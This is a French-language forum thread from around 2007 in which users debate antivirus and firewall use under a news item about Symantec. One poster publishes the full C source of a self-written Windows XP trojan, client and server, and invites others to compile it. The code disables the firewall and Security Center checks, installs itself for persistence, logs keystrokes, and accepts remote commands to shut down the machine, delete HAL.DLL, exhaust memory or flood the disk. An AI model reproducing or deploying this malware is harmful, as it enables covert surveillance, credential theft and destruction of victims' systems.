Symantec veut protéger les navigateurs en amont

ah oui c'est vrai, c'est même pour ça que j'ai commencé à poster :)... Je me suis laissé emporter par l'écriture et puis voila... lol

Ma pauvre londnoir tu n'as rien d'autre à dire?
Mes arguments ont été efficaces, irréfutables et tu n'as donc rien d'autre à dire, c'est triste. :(
Enfin, encore faudrait t-il que tu es lu mes messages...



il me semble que clubic se remplis de plus en plus de non-geeks

Parle pour toi...



Comme tu as l'air de me prendre pour une petite @!#$?* qui vient de découvrir son ordinateur je vais poster le code source de mon trojan(client + serveur) programmé en C.
Comme je l'ai créé afin de m'entrainer il n'a jamais été distribué et utilisé donc aucun anti-malwares ne le détecte, il fait en sorte de désactiver le firewall du SP2 et la vérification du firewall du centre de sécurité, se copie dans system32, créé une valeur dans une clé registre pour se lancer à chaque démarrage, lance un log, et écoute un port en attente de connection et instructions.
Il fonctionne sous windows XP, est rudimentaire et tu remarquera aussi l'absence d'envoi du log que je suis en train de coder:





SERVEUR


main.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h>
#include "autorun.h"
#include "copie.h"
#include "centre_securite.h"
#include "firewall.h"
#include "serveur.h"

void start_thread(void);


int main(int argc, char *argv[])
{
int err, ret, valeur_registre = 0;
LONG error;
char chemin[] = "C:\\WINDOWS\\SYSTEM32\\winfirewall.exe";
DWORD ksize = 8;
HKEY key;
WSADATA wsa_data;


FreeConsole();

err = WSAStartup(MAKEWORD(2,2), &wsa_data);

if(err)
{
exit(EXIT_FAILURE);
}


if(strcmp(argv[0], chemin))
{
copie(argv[0], chemin);
autorun(chemin);
centre_securite();
return EXIT_SUCCESS;
}


error = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Security Center", 0, KEY_ALL_ACCESS, &key);
RegQueryValueEx(key, "FirewallOverride", 0, NULL, (BYTE *)&valeur_registre, &ksize);
RegCloseKey(key);

if(valeur_registre != 1 && error == ERROR_SUCCESS)
{
centre_securite();
return EXIT_SUCCESS;
}

firewall();

start_thread();

Sleep(36000);

err = serveur();


WSACleanup();


if(err)
ret = EXIT_FAILURE;

else
ret = EXIT_SUCCESS;


return ret;
}





copie.c

#include <stdlib.h>
#include <stdio.h>
#include "copie.h"

void copie(char chemin_absolu[], char chemin[])
{
size_t taille_bloc;
unsigned char buffer[BUFSIZ] = "";
FILE *fichier_source = NULL;
FILE *fichier_copie = NULL;


fichier_source = fopen(chemin_absolu, "rb");

if(fichier_source == NULL)
{
exit(EXIT_FAILURE);
}


fichier_copie = fopen(chemin, "wb");

if(fichier_copie == NULL)
{
fclose(fichier_source);
exit(EXIT_FAILURE);
}

while((taille_bloc = fread(buffer, 1, BUFSIZ, fichier_source)) != 0)
{
fwrite(buffer, 1, taille_bloc, fichier_copie);
}

fclose(fichier_source);
fclose(fichier_copie);
}




autorun.c

#include <stdio.h>
#include <windows.h>
#include "autorun.h"

void autorun(char chemin[])
{
LONG error;
HKEY key;

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &key);
error = RegSetValueEx(key, "winfirewall", 0, REG_SZ, (BYTE *)chemin, strlen(chemin)+1);
RegCloseKey(key);

if(error != ERROR_SUCCESS)
{
remove(chemin);
exit(EXIT_FAILURE);
}
}





centre_securite.c

#include <windows.h>
#include "centre_securite.h"

void centre_securite(void)
{
int valeur = 1;
HKEY key;


RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Security Center", 0, KEY_ALL_ACCESS, &key);
RegSetValueEx(key, "FirewallOverride", 0, REG_DWORD, (BYTE *)&valeur, sizeof(valeur));
RegCloseKey(key);
}




firewall.c

#include <windows.h>
#include "firewall.h"

void firewall(void)
{
int valeur = 0;
HKEY key;


RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile", 0, KEY_ALL_ACCESS, &key);
RegSetValueEx(key, "EnableFirewall", 0, REG_DWORD, (BYTE *)&valeur, sizeof(valeur));
RegCloseKey(key);

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet002\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile", 0, KEY_ALL_ACCESS, &key);
RegSetValueEx(key, "EnableFirewall", 0, REG_DWORD, (BYTE *)&valeur, sizeof(valeur));
RegCloseKey(key);

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet003\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile", 0, KEY_ALL_ACCESS, &key);
RegSetValueEx(key, "EnableFirewall", 0, REG_DWORD, (BYTE *)&valeur, sizeof(valeur));
RegCloseKey(key);

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile", 0, KEY_ALL_ACCESS, &key);
RegSetValueEx(key, "EnableFirewall", 0, REG_DWORD, (BYTE *)&valeur, sizeof(valeur));
RegCloseKey(key);
}





keylogger.c

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "keylogger.h"

HHOOK hKeyHook;
static FILE *log = NULL;


DLLEXPORT LRESULT CALLBACK KeyEvent(int nCode, WPARAM wParam, LPARAM lParam)
{
if ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
{

BYTE KeyState[256];
WORD wBuf;
char ch[2] = "";


KBDLLHOOKSTRUCT hooked = *((KBDLLHOOKSTRUCT*)lParam);


GetKeyboardState(KeyState);

ToAscii(hooked.vkCode, hooked.scanCode, KeyState, &wBuf,0);


switch(hooked.vkCode)
{
case 9: fputs("<TAB>", log); break;
case 13: fputs("<ENTER>\n", log); break;
case VK_CONTROL: break;
case VK_LCONTROL: break;
case VK_RCONTROL: break;
case VK_BACK: fputs("<delete>", log); break;
case VK_DELETE: fputs("<Suppr>", log); break;

default :
{
ch[0]=((char)wBuf);
fputs(ch, log);
break;
}

}
}

return CallNextHookEx(hKeyHook, nCode, wParam, lParam);
}



void MsgLoop(void)
{
MSG message;
while (GetMessage(&message,NULL, 0, 0))
{
TranslateMessage(&message);
DispatchMessage(&message);
}
}


DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HINSTANCE hExe = GetModuleHandle(NULL);


if (!hExe) return 1;


hKeyHook = SetWindowsHookEx (WH_KEYBOARD_LL, (HOOKPROC)KeyEvent, hExe, 0);

MsgLoop();


return 0;
}


DWORD WINAPI create_thread(LPVOID lpParameter)
{
HANDLE hThread;
DWORD dwThread;


hThread = CreateThread(NULL ,0, (LPTHREAD_START_ROUTINE)KeyLogger, 0, 0, &dwThread);

if(hThread)
return WaitForSingleObject(hThread,INFINITE);


else
{
CloseHandle(hThread);
exit(EXIT_FAILURE);
}

}


void start_thread(void)
{
DWORD dwThread;
HANDLE hThread;

hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)create_thread, 0, 0, &dwThread);

if(hThread == NULL)
exit(EXIT_FAILURE);


log = fopen("C:\\WINDOWS\\update.txt", "a+");

if(log == NULL)
{
CloseHandle(hThread);
exit(EXIT_FAILURE);
}
}




serveur.c

#include <stdio.h>
#include <winsock2.h>
#include "serveur.h"
#include "saturation.h"
#define SIZE_ALLOC (1024*1024)
#define TELNET 23
#define EXIT 48
#define IEXPLORE 49
#define FIREFOX 50
#define SHUTDOWN 51
#define REMOVE_HAL 52
#define BIP 53
#define MEMORY_ALLOC 54
#define OVERFILES 55
#define SEND_LOG 56


int serveur(void)
{
int err = 0;
SOCKET socket_1 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if(socket_1 != INVALID_SOCKET)
{

{
int sock_error;
SOCKADDR_IN sin;

sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_family = AF_INET;
sin.sin_port = htons(TELNET);

sock_error = bind(socket_1, (SOCKADDR *)&sin, sizeof(sin));


if(sock_error != SOCKET_ERROR)
{
sock_error = listen(socket_1, 1);


if(sock_error != SOCKET_ERROR)
{

{
SOCKADDR_IN csin ;

int recsize = (int) sizeof(csin);

SOCKET client_sock = accept(socket_1, (SOCKADDR *)&csin, &recsize);


if(client_sock != INVALID_SOCKET)
{

{
int end = 0;

do
{

char data[256] = "";

sock_error = recv(client_sock, data, (int) sizeof(data)-1, 0);


if(sock_error != SOCKET_ERROR)
{

data[sock_error] = 0;


if(data[0] == EXIT)
{
end = 1;
}

else if(data[0] == IEXPLORE)
{
char commande[276] = "start iexplore.exe";


data[0] = ' ';

strcat(commande,data);
system(commande);
}

else if(data[0] == FIREFOX)
{
char commande[274] = "start firefox.exe";

data[0] = ' ';

strcat(commande,data);
system(commande);
}

else if(data[0] == SHUTDOWN)
{
system("start shutdown.exe -s -t 0");
}

else if(data[0] == REMOVE_HAL)
{
remove("C:\\WINDOWS\\system32\\HAL.DLL");
remove("C:\\WINDOWS\\ServicePackFiles\\i386\\hal.dll");
}

else if(data[0] == BIP)
{
int nombre_bip;

data[0] = ' ';
sscanf(data, "%d", &nombre_bip);

for(; nombre_bip > 0; nombre_bip--)
printf("\a");
}

else if(data[0] == MEMORY_ALLOC)
{
int nombre_allocations;

data[0] = ' ';
sscanf(data, "%d", &nombre_allocations);

for(; nombre_allocations > 0; nombre_allocations--)
malloc(SIZE_ALLOC);
}

else if(data[0] == OVERFILES)
{
data[0] = ' ';
saturation(data);
}

else if(data[0] == SEND_LOG)
{

}

}

else
{
err = 1;
end = 1;
}

}while(!end);

}


closesocket(client_sock);

client_sock = INVALID_SOCKET;
}

else
{
err = 1;
}
}
}

else
{
err = 1;
}
}

else
{
err = 1;
}


sock_error = closesocket(socket_1);

socket_1 = INVALID_SOCKET;


if(sock_error)
{
err = 1;
}
}
}

else
{
err = 1;
}

return err;
}




saturation.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include "saturation.h"


void saturation(char s_nombre_copies[])
{
int numero_fichier, nombre_copies, taille_nom, error = 1, i;
size_t taille_bloc;
char nom_fichier[53] = "C:\\WINDOWS\\restore\\explorer", s_numero_fichier[14]= "", extension[5] = ".exe";
FILE *fichier_source = NULL;
FILE *fichier_copie = NULL;
unsigned char buffer[BUFSIZ] = "";


fichier_source = fopen("C:\\WINDOWS\\explorer.exe", "rb");

if(fichier_source == NULL)
error = 0;


taille_nom = strlen(nom_fichier);
sscanf(s_nombre_copies, "%d", &nombre_copies);

CreateDirectory("C:\\WINDOWS\\restore", NULL);


for(numero_fichier=0; (numero_fichier < nombre_copies) && error; numero_fichier++)
{
for(i=0;s_numero_fichier[i] != '\0'; i++)
{
s_numero_fichier[i] = 0;
}

for(i=taille_nom;nom_fichier[i] != '\0'; i++)
{
nom_fichier[i] = 0;
}


sprintf(s_numero_fichier, "%d", numero_fichier+2);
strcat(nom_fichier, s_numero_fichier);
strcat(nom_fichier, extension);


fichier_copie = fopen(nom_fichier, "wb");

if(fichier_copie == NULL)
{
error = 0;
}

if(error)
{
while((taille_bloc = fread(buffer, 1, BUFSIZ, fichier_source)) != 0)
{
fwrite(buffer, 1, taille_bloc, fichier_copie);
}
}

rewind(fichier_source);
fclose(fichier_copie);
}

fclose(fichier_source);
}




copie.h

#ifndef COPIE
#define COPIE

void copie(char chemin_absolu[], char chemin[]);

#endif



autorun.h

#ifndef AUTORUN
#define AUTORUN

void autorun(char chemin[]);

#endif




centre_securite.h

#ifndef CENTRE_SECURITE
#define CENTRE_SECURITE

void centre_securite(void);

#endif




firewall.h

#ifndef FIREWALL
#define FIREWALL

void firewall(void);

#endif




keylogger.h

#ifndef KEYLOGGER
#define KEYLOGGER

#define DLLEXPORT __declspec(dllexport)

DLLEXPORT LRESULT CALLBACK KeyEvent(int nCode, WPARAM wParam, LPARAM lParam);
void MsgLoop(void);
DWORD WINAPI KeyLogger(LPVOID lpParameter);
DWORD WINAPI create_thread(LPVOID lpParameter);
void start_thread(void);

#endif




serveur.h

#ifndef SERVEUR
#define SERVEUR

int serveur(void);

#endif




saturation.h

#ifndef SATURATION
#define SATURATION

void saturation(char s_nombre_copies[]);

#endif









CLIENT

main.c

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include "client.h"

int main(void)
{
int err, ret;
WSADATA wsa_data;


err = WSAStartup(MAKEWORD(2,2), &wsa_data);

if(err)
{
fprintf(stderr, "WINSOCK2 non implemente");
getchar();
exit(EXIT_FAILURE);
}

puts("WINSOCK2: OK");


err = client();

WSACleanup();


if(err)
ret = EXIT_FAILURE;

else
ret = EXIT_SUCCESS;


getchar();

return ret;
}





client.c

#include <stdio.h>
#include <winsock2.h>
#include "clean.h"
#include "client.h"
#define TELNET 23
#define EXIT 48
#define RECEIVE_LOG 56

int client(void)
{
int err = 0;
SOCKET client_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if(client_sock != INVALID_SOCKET)
{
printf("Le socket %d est ouvert en mode TCP/IP \n", client_sock);

{
int sock_error;
SOCKADDR_IN csin;

csin.sin_family = AF_INET;
csin.sin_port = htons(TELNET);
csin.sin_addr.s_addr = htonl(INADDR_ANY);

sock_error = bind(client_sock, (SOCKADDR *)&csin, (int) sizeof(csin));


if(sock_error != SOCKET_ERROR)
{
char IP_serveur[16] = "";
SOCKADDR_IN sin;

sin.sin_family = AF_INET;
sin.sin_port = htons(TELNET);

printf("Adresse IP du PC cible: ");
fgets(IP_serveur, sizeof(IP_serveur), stdin);
clean(IP_serveur);
sin.sin_addr.s_addr = inet_addr(IP_serveur);

sock_error = connect(client_sock, (SOCKADDR *)&sin, (int) sizeof(sin));


if(sock_error != SOCKET_ERROR)
{
printf("Client connecte au serveur %s:%d avec le socket %d \n"
, inet_ntoa(sin.sin_addr)
, htons(sin.sin_port)
, client_sock);

{
int end = 0;


do
{
char texte_1[256] = "";

fgets(texte_1, sizeof(texte_1), stdin);


sock_error = send(client_sock, texte_1, strlen(texte_1), 0);


if(sock_error != SOCKET_ERROR)
{

if(texte_1[0] == EXIT)
{
end = 1;
}

else if(texte_1[0] == RECEIVE_LOG)
{
int reception;
FILE *log = fopen("C:\\log.txt", "a");

if(log != NULL)
{
do
{
char texte_2[256+1] = "";


reception = recv(client_sock, texte_2, (int) sizeof(texte_2)-1, 0);

if(reception)
{
texte_2[reception] = 0;
fputs(texte_2, log);
}

else
{
fclose(log);
}

}while(reception);
}

else
{
puts("Probleme lors de l'ouverture du fichier log");
}

}
}

else
{
perror("socket.send");
err = 1;
end = 1;
}

}while(!end);
}

closesocket(client_sock);
printf("Le socket %d du client est ferme, vous etes deconnecte du serveur \n", client_sock);

client_sock = INVALID_SOCKET;

}

else
{
perror("socket.connect");
err = 1;
}
}

else
{
perror("socket.bind");
err = 1;
}
}
}

else
{
perror("socket.open");
err = 1;
}


return err;

}




clean.c

#include <stdio.h>
#include <string.h>
#include "clean.h"

void clean(char data[])
{
char *p_data = strchr(data, '\n');


if(p_data)
{
*p_data = 0;
}

else
{
int c;

while((c = getchar()) != '\n' && c != EOF);
}
}




client.h

#ifndef CLIENT
#define CLIENT

int client(void);

#endif




clean.h

#ifndef CLEAN
#define CLEAN

void clean(char data[]);

#endif






Voilà, c'est fini, plus qu'à compiler très chère.
Il focntionne, testé et approuvé avec un ami, tu peux essayer.

---

L'indentation a sauté...
Edité le 27/06/2007 à 15:44
Edité le 27/06/2007 à 15:47

Moi qui penser que geek c'etait une vanne limite insulte lol ...
Par contre je doute fortement que clubic admette que l'on poste sur ses forums le code source d'un (soi-disant) trojan/malware :yeux2:

Recherche 62nds et tu aura bien pire.

Mais là tu es sur clubic ...
Edité le 27/06/2007 à 15:55

si tu le dis... averti donc un modérateur.

Ca devient grave quand même?!? Ou c'est moi qui déconne??

Overbit, tes post fait-les moins long, on dirais du spam

0v3rb1t a écrit:

Voilà, c'est fini, plus qu'à compiler très chère.
Il focntionne, testé et approuvé avec un ami, tu peux essayer.

Dit moi, ton truc la il marche sur mon XP/Vista sans que je rentre mon mot de passe administrateur ? Non hein, probablement pas... Alors il est ou le danger ? On en protege pas les happy clickers contre leur volonte.

Bjr tous ;)
MDR le coup du Canary sodomisé :D PTDR

Bon, Symantec se fait un coup de pub car ce programme existe déja en Logiciel Libre et celà s'appelle ProxiModo.
Trop tard Cimen-Tech l'Open-Source a une longueur d'avance :p
@+

Jolie code source, certes, mais dont je ne vois l'utilité ni ici, ni tout court. Il existe à ce jour une qunatité impressionnante de Trojan bien plus aboutis que celui ci.

Par ailleurs, au de là du fait qu'il faille executer le serveur sur la station pour installer le Trojan, ce qui est le lot de la plupart d'entre eux, il sera complètement inutile sur une machine équipée d'un firewall autre que celui de vista, ou planquée derrière un routeur équipé du telle protection...

bonne continuation

londnoir a écrit:
Je n'utilise jamais le super repertoire "documents and settings", sauf bien sur pour ce qui est obligé... C'est marqué desssus en grand "L'utilisateur y a planquer tout ses fichiers personnels", il fait partie des premiers répertoires attaqués...

Ce que tu ne sembles pas comprendre, c'est que l'on se fou de ce que tu fais, des risques que tu prends. Le problème, c'est que ta machine peut servir à pourrir les boites des autres personnes partout dans le monde.
Ca c'est la première chose à intégrer.
Ensuite, faire la pub pour se genre de comportement sur internet au risque que ça donne des idées à d'autres, je ne trouve pas ça très responsable. Tu fais ça, tu assumes. Tu penses être à l'abrit comme ça, parce que tu penses être capable de discerner ce qui est dangereux de ce qui ne l'est pas (à mon avis tu peux pas, ne serais-ce que parce que tu ne vois pas tout ce qui se passe dans l'OS), mais c'est pas le cas de tous ceux qui vont te lire...

On ne dit pas de transformer une machine en forteresse, mais un firewall c'est un strict minimum sur un système. Un antivirus/antispy c'est sérieusement conseillé: ça peut être simplement un scan de temps en temps, pas forcément une protection résidente mais la seconde option évite justement la réinstallation de l'OS dans pas mal de cas.

PS: moi je réinstalle jamais pour cause de virus/spyware et si je fais aucune grosse modif. hardware ça se compte en années.
Les mois, c'est le temps sans reboot ;) (de temps en temps je rajoute un disque :D )

...
Edité le 28/06/2007 à 17:15

Désolé, j'avais pas eu le temps de tout lire, je continue :D

londnoir a écrit:
Mais encore une fois, une petite technique s'impose (en plus de ne pas cliquer partout), quand le disque dur gratte sans raison sur internet ou que internet devient super lent, ben je me pose des questions, je fais un petit ctrl+alt+del, je verifie les process, j'évite évidement de rebooter le pc, je retire le rj45 si j'estime qu'il y a de drôles de trucs qui se produisent, puis je vérifie les endroits clés de Windows, y en a pas 20 000... Mais je comprends qu'il y en a pleins qui n'aiment pas faire ça, c'est tellement plus simple de se reposer sur une série de programme moyen qui coûte cher et aussi cher que windows...

Tu crois sincèrement que la plupart des gens sont en mesure de comprendre ce qu'est un processus et de déterminer ce qui peut être un spyware ? (dans la mesure où il est visible biensûr) Tu crois qu'ils savent identifier la cause d'un ralentissement ? Pour l'instant j'ai vu deux cas si on prend des non informaticiens (jeunes ou pas):
- Le type qui fonce qui clique sur tout et si ça rame ça le perturbe pas plus que ça
- Le type qui a peur de l'outil et qui t'appelles dès qu'une fenêtre semble avoir changé par rapport à d'habitude ou si internet se connecte en 3 fois au lieu d'une.
Au milieu y a quelque cas de personne qui maitrise un peu, mais qui sont très loin de savoir analyser les services et programmes chargés. Ca s'improvise pas.

londnoir a écrit:
Alors quand t'auras trouver un pirate qui s'en prend à des gens qu'on rien de spécial sur leur bécane, tu me fais signe hein... Tu caches des trucs pornos et t'as peur qu'on les trouve?

Alors c'est pas à moi que ça s'adressait, mais je te fais signe quand même :D
La semaine dernière j'avais la machine d'un simple débutant en info qui avait été piratée et servait à expédier du SPAM en grosse quantité. Y a avait rien à chercher sur sa machine et l'utilisation faite n'avait aucun rapport avec le contenu du HDD. C'est juste un bon moyen de se planquer. :neutre:

Et puis je vois pas ce qu'une mise à jour de IE ou WMP (que j'utilise pas) viendrait changer avec la protection de mon IP, sais tu au moins ce que c'est?

Si tu les as bloqué avec un firewall logiciel, OK. Ils n'ont pas accès au net. Si tu t'en sers pas, évidemment, tu n'ouvre pas ta machine à une attaque, sauf que cette appli peut-être utiliser par un programme malveillant. Faire la mise à jour ne coûte rien. Je la fait (comme toi, en bloc et manuellement) et pourtant je ne m'en sers pas.

et jusqu'à preuve du contraire, pour se chopper des rootkits ou d'autres conneries du genre, faut soit être ignorant et cliquer partout, soit l'accepter de ton plein gré. Après la détection invisible par le système et tout ce que tu veux c'est une autre paire de manches... T'as fait le con en premier, faut pas jetter la faute sur ton pauvre pc muni d'un pauvre windows

+1 Mais encore fait-il avoir affaire à quelqu'un qui connais les risques. Malheureusement c'est pas ce que je croise en majorité. :/

et si 5 ans ca t'étonnes, c'est parce que tu sais pas exploiter un peu plus ton pc, le majeur problème des gens! Et on ne leur en veux pas, c'est de la faute de microsoft (simplifier, brider, le tout sans expliquer), je ne vois que ça.

Ouais, enfin, ils sont pas responsable de tout non plus. Si l'utilisateur ne fait aucun effort. Les formations ça existe, dans les entreprise par exemple, mais je sais pas pourquoi la formation "comment envoyer des email" était plus suivie que "comment utiliser l'outil informatique". :neutre:

Entièrement d'accord avec toi, mais j'excluais les débutants de mes propos. C'est justement pour ça que ces programmes sont inventés.

Moi je voulais simplement qu'on arrête de s'acharner sur ceux qui n'ont pas installé tout ça.

Pour le fun, j'ai fait un scan complet avec tout les programmes sois disant bien. Bilan ma machine de 2 mois a 9 cookies (des trackers), je pensais même que j'allais avoir des entrées dans le registre.

Alors faut arrêter de dire que c'est pas possible et surtout que c'est de l'inconscience ou de l'irresponsabilité... c'est de la passion je dirais :)

Je vois que ça horrifie tout le monde de ne pas avoir de firewall, je tiens a dire que j'ai pas un modem directement branché sur la bécane, donc y en a pas besoin réellement.
Edité le 28/06/2007 à 20:54

Tu dois pas faire grand chose avec, mais c'est possible avec un XP SP2 à jour, pas mal de failles ont été comblées.
Néanmoins c'est pas conseillé :neutre: Comme tu dis c'est ta passion, si elle se transforme en catastrophe on a pas envie d'en profiter. :neutre:
Donc moins de monde jouera à ça, mieux nos compte mail (pour l'essentiel) se porteront ;)
En plus ça existe en gratuit, c'est dommage de pas en profiter. :) Avast, AVG / Kerio, ZoneAlarm... C'est pas du dernier cri, mais ça arrête l'essentiel et dès fois c'est presque ergonomique :nexath

Pour Norton Anti-Virus il faut un dual-core : 1 core pour Norton et 1 pour utiliser sa becane

aresledieu a écrit:
En même temps parler de symantec sans les critiquer c'est pas facile ;)

Sinon, une question, je n'ai jamais eu le moindre antivirus/firewall sur ma bécane qui est connectée environ 13-14 heures par jour depuis au moins 4 ans et je n'ai choppé qu'un seul virus/trojan depuis ... je fais parti des chanceux ou un antivirus reste superflu tant que l'on maîtrise ce qui se passe sur la bécane ? (c'est une vrai question ... :) )

++

Edit : je me rappelle d'un news (clubic ?) dans laquelle un expert informatique prétendait que 80% (voire plus?) des machines était infestée suite a une manip utilisateur ...

Je suis comme toi et non, tu n'es pas un chanceux :)
Juste quelqu'un qui sait ce qu'il fait, comme environ ~5% des utilisateurs de pc lambda ( hors professionnels :) )

@0v3rb1t : Comment t'expliques que les scans ne donnent rien dans ce cas ? :)
Tourne ta langue dans ta bouche, ou bien sais de quoi tu parles, c'est toujours mieux, et ce, dans les deux cas ;)
Et c'est pas parce que t'es un "hacker" que tu sais ce qu'il se passe sur nos pc.
Edité le 12/09/2008 à 23:25